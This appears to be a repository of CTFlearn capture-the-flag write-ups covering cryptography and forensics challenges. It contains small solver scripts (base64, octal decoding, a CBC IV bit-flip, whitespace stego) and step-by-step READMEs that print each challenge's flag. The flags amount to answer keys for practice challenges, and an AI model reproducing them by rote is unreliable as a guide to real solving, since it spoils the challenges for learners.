/Cryptography/So many 64s/exploit.py: -------------------------------------------------------------------------------- 1 | import base64 2 | 3 | f = open('flag.txt', 'r') 4 | text = f.read() 5 | 6 | while 1: 7 | text = base64.b64decode(text).decode('utf-8') 8 | 9 | if '{' in text: 10 | print(text) 11 | #continue 12 | break -------------------------------------------------------------------------------- /Cryptography/Substitution Cipher/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Substitution Cipher/Flag.png -------------------------------------------------------------------------------- /Cryptography/Substitution Cipher/Input.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Substitution Cipher/Input.png -------------------------------------------------------------------------------- /Cryptography/Suspecious message/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Suspecious message/Flag.png -------------------------------------------------------------------------------- /Cryptography/Suspecious message/README.md: -------------------------------------------------------------------------------- 1 | ## Suspecious message 2 | The main idea to find the flag is to use PlayFair Cipher. 3 | 4 | #### Step-1: 5 | We are given `photo.png` and a message `MQDzqdor{Ix4Oa41W_1F_B00h_m1YlqPpPP}`. We know that the flag format has to be CTFlearn{} and so, I got idea from the `photo.png`. 6 | 7 | 8 | 9 | #### Step-2: 10 | Immediately, I tried for Playfair Cipher at: 11 | http://rumkin.com/tools/cipher/playfair.php 12 | 13 | #### Step-3: 14 | I used the given parameters and got the flag. 15 | 16 | 17 | 18 | The flag at the end, seemed bit obfuscated. So, I replaced all the P with R. 19 | #### Step-4: 20 | Finally, the flag becomes: 21 | `CTFlearn{Pl4Yf41R_1S_C00l_c1PheRrRR}` -------------------------------------------------------------------------------- /Cryptography/Suspecious message/photo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Suspecious message/photo.png -------------------------------------------------------------------------------- /Cryptography/Symbolic Decimals/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Symbolic Decimals/Flag.png -------------------------------------------------------------------------------- /Cryptography/Symbolic Decimals/README.md: -------------------------------------------------------------------------------- 1 | ## Symbolic Decimals 2 | The main idea finding the flag is simple Cryptographic knowledge. 3 | 4 | #### Step-1: 5 | After I read the given message: 6 | 7 | ``` 8 | Did you know that you can hide messages with symbols? For example, 9 | !@#$%^&*( is 123456789! 10 | Now Try: ^&,*$,&),!@#,*#,!!^,(&,!!$,(%,$^,(%,*&,(&,!!$,!!%,(%,$^,(%,&),!!!,!!$,(%,$^,(%,&^,!)%,!)@,!)!,!@% 11 | However, this isn't as easy as you might think. 12 | ``` 13 | 14 | #### Step-2: 15 | If we see carefully, the assignment of `!@#$%^&*(` = `123456789` is same as QWERTY Keyboard symbols. 16 | So it means `)` = `0`. 17 | 18 | So finally `!@#$%^&*()` = `1234567890` 19 | 20 | #### Step-3: 21 | I just decrypted the text as normal decimal text. 22 | 23 | ```python 24 | message = "^&,*$,&),!@#,*#,!!^,(&,!!$,(%,$^,(%,*&,(&,!!$,!!%,(%,$^,(%,&),!!!,!!$,(%,$^,(%,&^,!)%,!)@,!)!,!@%" 25 | numbers = "67,84,70,123,83,116,97,114,95,46,95,87,97,114,115,95,46,95,70,111,114,95,46,95,76,105,102,101,125" 26 | ``` 27 | If you want the string of numbers as spaced. It's here: 28 | `67 84 70 123 83 116 97 114 95 46 95 87 97 114 115 95 46 95 70 111 114 95 46 95 76 105 102 101 125` 29 | 30 | #### Step-4: 31 | We just need to decrypt it online. I did it [here](https://cryptii.com/pipes/decimal-text). 32 | 33 | 34 | 35 | #### Step-5: 36 | Finally the flag becomes: 37 | `CTF{Star_._Wars_._For_._Life}` -------------------------------------------------------------------------------- /Cryptography/The Simpsons/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/The Simpsons/Flag.png -------------------------------------------------------------------------------- /Cryptography/The Simpsons/ItsKrumpingTime.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/The Simpsons/ItsKrumpingTime.jpg -------------------------------------------------------------------------------- /Cryptography/The Simpsons/encoding.py: -------------------------------------------------------------------------------- 1 | encoded = "152 162 152 145 162 167 150 172 153 162 145 170 141 162" 2 | list_encoded = encoded.split(' ') 3 | decimal_encoded = [int(i, 8) for i in list_encoded] 4 | string_encoded = [chr(i) for i in decimal_encoded] 5 | string_encoded = ''.join(string_encoded) 6 | print("String Encoded: " + string_encoded) 7 | -------------------------------------------------------------------------------- /Cryptography/The Simpsons/key.py: -------------------------------------------------------------------------------- 1 | key = "110 157 167 040 155 165 143 150 040 144 151 144 040 115 141 147 147 151 145 040 157 162 151 147 151 156 141 154 154 171 040 143 157 163 164 077 040 050 104 151 166 151 144 145 144 040 142 171 040 070 054 040 164 157 040 164 150 145 040 156 145 141 162 145 163 164 040 151 156 164 145 147 145 162 054 040 141 156 144 040 164 150 145 156 040 160 154 165 163 040 146 157 165 162 051" 2 | list_key = key.split(' ') 3 | decimal_key = [int(i, 8) for i in list_key] 4 | asc_key = [chr(i) for i in decimal_key] 5 | asc_key = ''.join(asc_key) 6 | print(asc_key) 7 | -------------------------------------------------------------------------------- /Cryptography/Tone dialing/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Tone dialing/Flag.png -------------------------------------------------------------------------------- /Cryptography/Tone dialing/README.md: -------------------------------------------------------------------------------- 1 | ## Tone dialing 2 | The main idea to find the flag is to analyze `.wav` file and get the flag using DTMF Decoder. 3 | 4 | #### Step-1: 5 | We are given `you_know_what_to_do.wav`. After searching for a while on internet, I came across this [DTMF Decoder](http://www.polar-electric.com/DTMF/Index.html) which eventually helped me to solve problem. 6 | 7 | #### Step-2: 8 | This [DTMF GitHub Repo](https://github.com/ribt/dtmf-decoder) is a nice tool, which can help us to extract data from wav file. 9 | 10 | After, following the directions mentioned in the repository, I executed the following command: 11 | ``` 12 | dtmf you_know_what_to_do.wav 13 | ``` 14 | I got this following output: 15 | ``` 16 | 67847010810197110123678289808479718265807289125 17 | ``` 18 | So, general delimiting the numbers gave me: 19 | ``` 20 | 67 84 70 108 101 97 110 123 67 82 89 80 84 79 71 82 65 80 72 89 125 21 | ``` 22 | 23 | #### Step-3: 24 | I used these numbers to get ASCII text [here](https://convert.town/ascii-to-text). Later we got the flag. 25 | 26 | 27 | 28 | #### Step-4: 29 | Finally, the flag becomes: 30 | `CTFlean{CRYPTOGRAPHY}` -------------------------------------------------------------------------------- /Cryptography/Tone dialing/you_know_what_to_do.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Tone dialing/you_know_what_to_do.wav -------------------------------------------------------------------------------- /Cryptography/Vigenere Cipher/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Vigenere Cipher/Flag.png -------------------------------------------------------------------------------- /Cryptography/Vigenere Cipher/README.md: -------------------------------------------------------------------------------- 1 | ## Vigenere Cipher 2 | The main idea finding the flag is just having knowledge about Vigenere Cipher. 3 | 4 | #### Step-1: 5 | 6 | Its very easy if you have basic idea of Vigenere Cipher. If you don't know, please refer : 7 | https://en.wikipedia.org/wiki/Vigen%C3%A8re_cipher 8 | 9 | So this is what is given in the message of challenge: 10 | 11 | ``` 12 | The vignere cipher is a method of encrypting alphabetic text by using a series of interwoven Caesar ciphers based on the letters of a keyword.
13 | 14 | I’m not sure what this means, but it was left lying around: blorpy 15 | 16 | gwox{RgqssihYspOntqpxs} 17 | ``` 18 | #### Step-2: 19 | One thing is important to know that Vigenere Cipher requires a key to decode any message. 20 | I used this URL to decode my message and used given key as : `blorpy` 21 | https://cryptii.com/ 22 | 23 | #### Step-3: 24 | This was my output: 25 | 26 | 27 | 28 | That's it. That's our flag. 29 | 30 | #### Step-4: 31 | 32 | Finally the flag becomes: 33 | `flag{CiphersAreAwesome}` -------------------------------------------------------------------------------- /Cryptography/We want Nudes instead of Nukes/exploit.py: -------------------------------------------------------------------------------- 1 | IV = bytearray.fromhex("391e95a15847cfd95ecee8f7fe7efd66") 2 | CT = bytearray.fromhex("8473dcb86bc12c6b6087619c00b6657e") 3 | 4 | # Hashes from the description of challenge 5 | ORIGINAL_MESSAGE = bytearray.fromhex( 6 | "464952455f4e554b45535f4d454c4121") # FIRE_NUKES_MELA! 7 | 8 | ALTERED_MESSAGE = bytearray.fromhex( 9 | "53454e445f4e554445535f4d454c4121") # SEND_NUDES_MELA! 10 | 11 | ALTERED_IV = bytearray() 12 | 13 | # XOR 14 | for i in range(16): 15 | ALTERED_IV.append(ALTERED_MESSAGE[i] ^ ORIGINAL_MESSAGE[i] ^ IV[i]) 16 | 17 | print(f'Flag: flag{{{ALTERED_IV.hex()},{CT.hex()}}}') -------------------------------------------------------------------------------- /Cryptography/Zippy.zip/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/Flag.png -------------------------------------------------------------------------------- /Cryptography/Zippy.zip/exploit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/exploit.png -------------------------------------------------------------------------------- /Cryptography/Zippy.zip/exploit.py: -------------------------------------------------------------------------------- 1 | # Assigning the output string from the previous "crack.py" file execution 2 | output = """ 3 | flag00.zip / flag00 : 'CTFl' 4 | flag01.zip / flag01 : 'earn' 5 | flag02.zip / flag02 : '{s0m' 6 | flag03.zip / flag03 : '3t1m' 7 | flag04.zip / flag04 : '35_u' 8 | flag05.zip / flag05 : '$1ng' 9 | flag06.zip / flag06 : '_h4r' 10 | flag07.zip / flag07 : 'd_p4' 11 | flag08.zip / flag08 : 's5w0' 12 | flag09.zip / flag09 : 'rd_i' 13 | flag10.zip / flag10 : '5_n0' 14 | flag11.zip / flag11 : 't_3n' 15 | flag12.zip / flag12 : '0ugh' 16 | flag13.zip / flag13 : '}' 17 | """ 18 | 19 | # Split the output into lines and extract the last column 20 | lines = output.strip().split('\n') 21 | last_column = [line.split(' : ')[1].strip(" '") for line in lines] 22 | 23 | # Concatenate the strings within quotes 24 | flag = ''.join(last_column) 25 | 26 | # Print the final flag 27 | print("Flag: " + flag) 28 | -------------------------------------------------------------------------------- /Cryptography/Zippy.zip/exploit.sh: -------------------------------------------------------------------------------- 1 | cd flag_parts/ 2 | python3 ../crack.py flag00.zip flag01.zip flag02.zip flag03.zip flag04.zip flag05.zip flag06.zip flag07.zip flag08.zip flag09.zip flag10.zip flag11.zip flag12.zip flag13.zip -------------------------------------------------------------------------------- /Cryptography/Zippy.zip/flag_parts.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts.zip -------------------------------------------------------------------------------- /Cryptography/Zippy.zip/flag_parts/flag00.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts/flag00.zip -------------------------------------------------------------------------------- /Cryptography/Zippy.zip/flag_parts/flag01.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts/flag01.zip -------------------------------------------------------------------------------- /Cryptography/Zippy.zip/flag_parts/flag02.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts/flag02.zip -------------------------------------------------------------------------------- /Cryptography/Zippy.zip/flag_parts/flag03.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts/flag03.zip -------------------------------------------------------------------------------- /Cryptography/Zippy.zip/flag_parts/flag04.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts/flag04.zip -------------------------------------------------------------------------------- /Cryptography/Zippy.zip/flag_parts/flag05.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts/flag05.zip -------------------------------------------------------------------------------- /Cryptography/Zippy.zip/flag_parts/flag06.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts/flag06.zip -------------------------------------------------------------------------------- /Cryptography/Zippy.zip/flag_parts/flag07.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts/flag07.zip -------------------------------------------------------------------------------- /Cryptography/Zippy.zip/flag_parts/flag08.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts/flag08.zip -------------------------------------------------------------------------------- /Cryptography/Zippy.zip/flag_parts/flag09.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts/flag09.zip -------------------------------------------------------------------------------- /Cryptography/Zippy.zip/flag_parts/flag10.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts/flag10.zip -------------------------------------------------------------------------------- /Cryptography/Zippy.zip/flag_parts/flag11.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts/flag11.zip -------------------------------------------------------------------------------- /Cryptography/Zippy.zip/flag_parts/flag12.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts/flag12.zip -------------------------------------------------------------------------------- /Cryptography/Zippy.zip/flag_parts/flag13.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts/flag13.zip -------------------------------------------------------------------------------- /Cryptography/otpyrC/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/otpyrC/1.png -------------------------------------------------------------------------------- /Cryptography/otpyrC/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/otpyrC/Flag.png -------------------------------------------------------------------------------- /Cryptography/otpyrC/README.md: -------------------------------------------------------------------------------- 1 | ## otpyrC 2 | The main idea of finding the flag is String Reversal and simple decryption. 3 | 4 | 5 | #### Step-1: 6 | After I read the given message: 7 | 8 | ``` 9 | Okay, this one is pretty easy... but not necessarily. 10 | d733432373937303734373666343730373937323733343b7644534 11 | ``` 12 | 13 | #### Step-2: 14 | I was lazy af to write a script in python. So, I just did the Reversal Online at: (reverse because after seeing title) 15 | https://codebeautify.org/reverse-string 16 | 17 | 18 | 19 | #### Step-3: 20 | 21 | It was just hexadecimal text and I decrypted it. 22 | 23 | 24 | 25 | I got `CTF{43727970746f7470797243}`, but did not work as flag. 26 | 27 | So decrypted the string again. 28 | 29 | 30 | 31 | #### Step-4: 32 | Finally, the flag becomes: 33 | `CryptotpyrC` -------------------------------------------------------------------------------- /Cryptography/otpyrC/Reverse.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/otpyrC/Reverse.png -------------------------------------------------------------------------------- /Forensics/07601/AGT.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/07601/AGT.png -------------------------------------------------------------------------------- /Forensics/A CAPture of a Flag/Base64.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/A CAPture of a Flag/Base64.png -------------------------------------------------------------------------------- /Forensics/A CAPture of a Flag/HTTP.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/A CAPture of a Flag/HTTP.png -------------------------------------------------------------------------------- /Forensics/A CAPture of a Flag/README.md: -------------------------------------------------------------------------------- 1 | ## A CAPture of a Flag 2 | The main idea finding the flag is exploring the given PCAP file in Wireshark. 3 | 4 | #### Step-1: 5 | After downloading `flag (4)` (a PCAP file) from the cloud, I directly opened it in Wireshark application. 6 | 7 | For those, who are unaware om how to filter streams or use this application, please do your homework here: 8 | 9 | https://www.wireshark.org/ 10 | 11 | #### Step-2: 12 | 13 | I tried to check TCP stream for some clues and then I tried UDP streams for some clues. Finally, I used the filter to get only HTTP requests. 14 | 15 | 16 | 17 | #### Step-3: 18 | 19 | I went through all requests and this request caught my eye. 20 | `247 2.270670 10.50.203.75 185.21.216.190 HTTP 504 GET /?msg=ZmxhZ3tBRmxhZ0luUENBUH0= HTTP/1.1 ` 21 | 22 | It has a Base64 encrypted message. 23 | 24 | #### Step-4: 25 | 26 | So finally, I decoded it online at: https://www.base64decode.org/ 27 | 28 | I got the flag there: 29 | 30 | 31 | 32 | Voila, we have it here. 33 | 34 | #### Step-4: 35 | Finally the flag becomes: 36 | `flag{AFlagInPCAP}` -------------------------------------------------------------------------------- /Forensics/A CAPture of a Flag/flag (4): -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/A CAPture of a Flag/flag (4) -------------------------------------------------------------------------------- /Forensics/Binwalk/PurpleThing.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Binwalk/PurpleThing.jpeg -------------------------------------------------------------------------------- /Forensics/Binwalk/README.md: -------------------------------------------------------------------------------- 1 | ## Binwalk 2 | The main idea finding the flag using Binwalk commands and its extensions. 3 | 4 | #### Step-1: 5 | After downloading `PurpleThing.jpeg` from the cloud, I tried `strings PurpleThing.jpeg | grep {`. 6 | 7 | 8 | 9 | I couldn't find anything special. 10 | 11 | #### Step-2: 12 | 13 | So I tried `binwalk PurpleThing.jpeg` as the question suggests. 14 | 15 | It showed me following output: 16 | 17 | ```bash 18 | DECIMAL HEXADECIMAL DESCRIPTION 19 | -------------------------------------------------------------------------------- 20 | 0 0x0 PNG image, 780 x 720, 8-bit/color RGBA, non-interlaced 21 | 41 0x29 Zlib compressed data, best compression 22 | 153493 0x25795 PNG image, 802 x 118, 8-bit/color RGBA, non-interlaced 23 | ``` 24 | 25 | Clearly, there is hidden data in there, let's extract that. 26 | #### Step-3: 27 | I input a command of `binwalk -D 'image:png' PurpleThing.jpeg` and I get a directory named `_PurpleThing.jpeg.extracted`. 28 | 29 | The contents are different files. In it `25795.png` has the flag. 30 | 31 | #### Step-4: 32 | 33 | Finally the flag becomes: 34 | `ABCTF{b1nw4lk_is_us3ful}` 35 | -------------------------------------------------------------------------------- /Forensics/Blank Page/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Blank Page/1.png -------------------------------------------------------------------------------- /Forensics/Blank Page/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Blank Page/Flag.png -------------------------------------------------------------------------------- /Forensics/Blank Page/TheMessage.txt: -------------------------------------------------------------------------------- 1 | ‏ ‏‏ ‏‏‏ ‏ ‏‏ ‏‏‏‏ ‏‏ ‏‏ ‏ ‏ ‏ ‏ ‏ ‏‏ ‏ ‏‏ ‏ ‏ ‏ ‏ ‏‏‏ ‏‏ ‏‏ ‏‏ ‏‏‏‏ ‏‏ ‏ ‏‏ ‏ ‏‏ ‏‏ ‏ ‏ ‏ ‏‏ ‏‏‏ ‏‏‏ ‏ ‏‏ ‏ ‏ ‏ ‏‏ ‏ ‏ ‏ ‏ ‏‏ ‏ ‏ ‏‏‏ ‏ ‏‏‏ ‏ ‏‏ ‏‏‏‏ ‏‏‏ ‏ ‏‏ ‏ ‏ ‏‏‏ ‏‏ ‏‏‏ ‏ ‏‏‏ ‏‏ ‏ ‏ ‏ ‏ ‏‏ ‏ ‏‏ ‏‏ ‏‏‏ ‏ ‏‏ ‏ ‏ ‏‏ ‏‏ ‏‏‏ ‏‏ ‏ ‏ ‏ ‏ ‏ ‏ ‏ ‏‏ ‏‏ ‏ ‏‏‏‏ ‏ ‏‏ ‏‏‏‏ ‏‏‏ ‏ ‏ ‏ ‏‏‏ ‏ ‏‏ ‏ ‏ ‏‏ ‏ ‏‏ ‏ ‏ ‏‏‏ ‏ ‏‏ ‏ ‏‏ ‏ ‏ ‏‏‏ ‏‏ ‏ ‏‏‏‏ ‏ ‏‏ ‏‏‏‏ ‏‏‏ ‏ ‏ ‏ ‏‏‏ ‏‏ ‏ ‏‏‏ ‏‏ ‏‏‏ ‏‏ ‏‏ ‏ ‏ ‏‏ ‏ ‏ ‏‏‏ ‏ ‏ ‏‏ ‏‏ ‏‏‏‏ ‏‏ ‏‏‏ ‏‏ ‏‏‏ ‏‏‏ ‏ ‏‏ ‏ ‏‏‏ ‏ ‏‏‏ ‏‏ ‏ ‏‏‏ ‏ ‏ ‏ ‏‏ ‏ ‏‏ ‏‏‏‏ ‏‏‏ ‏ ‏ ‏‏‏ ‏ ‏ ‏‏ ‏‏ ‏‏ ‏ ‏ ‏‏‏ ‏ ‏‏‏ ‏‏ ‏‏‏ ‏ ‏ ‏‏‏ ‏ ‏‏ ‏ ‏‏‏ ‏‏ ‏‏ ‏ ‏‏ ‏ ‏‏‏ ‏‏‏ ‏‏ ‏ ‏ ‏‏ ‏‏ ‏‏ ‏‏ ‏ ‏‏ ‏‏ ‏‏ ‏‏‏‏ ‏‏ ‏‏ ‏ ‏‏ ‏ ‏ ‏ ‏‏‏ ‏ ‏‏ ‏‏‏‏ ‏‏ ‏‏ ‏ ‏‏ ‏‏‏‏ ‏‏‏ ‏ ‏‏‏ ‏ ‏‏ ‏‏‏‏ ‏‏‏ ‏‏‏ ‏ ‏‏‏ ‏ ‏ ‏ ‏‏‏ ‏‏ ‏‏‏‏ ‏‏ ‏‏‏‏ ‏‏ ‏ ‏ ‏‏ ‏‏ ‏‏‏ ‏ ‏ ‏‏ ‏‏ ‏‏ ‏ ‏‏ ‏ ‏‏‏ ‏ ‏ ‏ ‏ ‏ ‏‏ ‏ ‏ ‏ ‏ ‏‏ ‏‏ ‏‏ ‏‏ ‏ ‏ ‏‏ ‏ ‏‏‏ ‏ ‏‏ ‏‏‏ ‏‏‏‏ ‏‏ ‏ ‏ ‏ ‏‏ ‏‏ ‏ ‏‏‏‏‏ ‏‏‏‏ ‏ ‏‏ ‏‏‏ ‏ ‏ ‏ ‏‏‏‏‏ ‏‏‏ ‏ ‏‏ ‏‏ ‏ ‏‏‏‏ ‏ ‏‏‏ ‏‏ ‏ ‏ ‏‏‏‏‏ ‏‏‏ ‏ ‏‏ ‏ ‏‏ ‏ ‏ ‏‏ ‏ ‏ ‏ ‏‏‏‏‏ ‏‏‏‏ ‏ ‏‏ ‏‏‏‏ ‏‏‏ ‏ ‏ ‏ ‏‏‏‏‏ ‏‏‏ ‏‏ ‏ ‏‏ ‏ ‏ ‏‏ ‏ ‏ ‏‏ ‏‏ ‏‏ ‏ ‏‏‏‏‏ ‏ -------------------------------------------------------------------------------- /Forensics/Blank Page/exploit.py: -------------------------------------------------------------------------------- 1 | #! usr/bin/python3 2 | file = open("TheMessage.txt", "r").read() 3 | result = "" 4 | for char in file: 5 | if ord(char) == 32: 6 | result += "0" 7 | else: 8 | result += "1" 9 | print(result) -------------------------------------------------------------------------------- /Forensics/Bobby Toe's iPad/README.md: -------------------------------------------------------------------------------- 1 | ## Bobby Toe's iPad 2 | The main idea of getting the flag is using hex dump to get the flag. 3 | 4 | #### Step-1: 5 | After I downloaded `bobbytoesipad.png`, I tried basic strings, binwalk, but nothing special. 6 | 7 | 8 | 9 | #### Step-2: 10 | So, now I checked the hex code at: https://www.onlinehexeditor.com/ 11 | 12 | 13 | 14 | I split the image where I found the message: `congrats you found me! you win an iPad!` 15 | 16 | ##### Note: `ff d8 ff e0` are the first hex of a JPEG file. 17 | 18 | After splitting, I got this: 19 | 20 | 21 | 22 | #### Step-3: 23 | I used an [Online Stego Tool](https://incoherency.co.uk/image-steganography/#unhide) to find hidden message in the image: 24 | 25 | I got this: 26 | 27 | 28 | 29 | Also, I got this weird string in the image: `zpv_tigqylhbafmeoesllpms` 30 | 31 | #### Step-4: 32 | The description of the challenge hints that the flag is in the iPad, so after some search, I got this: http://rumkin.com/tools/cipher/otp.php to decode one-time pad message. 33 | 34 | Note that we got `bbbabydonthurtmewhatislove` string in split image before! That's the padding here. 35 | 36 | 37 | 38 | 39 | #### Step-5: 40 | Finally, the flag becomes: 41 | `you_thinkyougotskillshuh` -------------------------------------------------------------------------------- /Forensics/Bobby Toe's iPad/bobbytoesipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Bobby Toe's iPad/bobbytoesipad.png -------------------------------------------------------------------------------- /Forensics/Bobby Toe's iPad/hex.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Bobby Toe's iPad/hex.png -------------------------------------------------------------------------------- /Forensics/Bobby Toe's iPad/otp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Bobby Toe's iPad/otp.png -------------------------------------------------------------------------------- /Forensics/Bobby Toe's iPad/split.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Bobby Toe's iPad/split.png -------------------------------------------------------------------------------- /Forensics/Bobby Toe's iPad/stego.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Bobby Toe's iPad/stego.png -------------------------------------------------------------------------------- /Forensics/Brute Force is Fun!/legotroopers.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Brute Force is Fun!/legotroopers.jpg -------------------------------------------------------------------------------- /Forensics/Brute Force is Fun!/output/audit.txt: -------------------------------------------------------------------------------- 1 | Foremost version 1.5.7 by Jesse Kornblum, Kris Kendall, and Nick Mikus 2 | Audit File 3 | 4 | Foremost started at Thu Sep 10 20:41:19 2020 5 | Invocation: foremost legotroopers.jpg 6 | Output directory: /home/rishit/Desktop/Buffer/output 7 | Configuration file: /etc/foremost.conf 8 | ------------------------------------------------------------------ 9 | File: legotroopers.jpg 10 | Start: Thu Sep 10 20:41:19 2020 11 | Length: 1 MB (2045340 bytes) 12 | 13 | Num Name (bs=512) Size File Offset Comment 14 | 15 | 0: 00000000.jpg 6 KB 0 16 | 1: 00000012.zip 1 MB 6438 17 | Finish: Thu Sep 10 20:41:19 